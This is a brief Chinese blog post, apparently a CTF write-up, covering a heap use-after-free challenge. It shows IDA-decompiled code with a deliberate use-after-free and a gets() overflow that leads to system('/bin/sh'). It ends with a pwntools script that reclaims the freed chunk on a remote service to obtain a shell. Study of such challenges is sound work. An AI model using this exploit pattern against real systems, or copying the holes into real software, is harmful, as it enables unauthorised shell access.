pwn-堆(use-after-uaf)

heap_Easy_Uaf

Ida反汇编

int __cdecl Are()
{
  int result; // eax
  int size; // [rsp+4h] [rbp-1Ch] BYREF
  char *a; // [rsp+8h] [rbp-18h]
  char *b; // [rsp+10h] [rbp-10h]
  unsigned __int64 v4; // [rsp+18h] [rbp-8h]

  v4 = __readfsqword(0x28u);
  a = (char *)malloc(0x68uLL);
  strcpy(a, "Flag");
  free(a);
  size = 0;
  puts("Please Input Chunk size :");
  __isoc99_scanf("%d", &size);
  getchar();
  b = (char *)malloc(size);
  puts("Please Input Content : ");
  gets(b);
  result = strncmp(a, "Flag", 4uLL);
  if ( !result )
    return system("/bin/sh");
  return result;
}

脚本:

from pwn import *
r = remote("1.95.36.136", 2061)
r.sendline(b'5')
r.sendline(b"104")
r.sendline(b'Flag')
r.interactive()

posted @ 2025-04-24 10:57  lethe311  阅读(1)  评论(0)    收藏  举报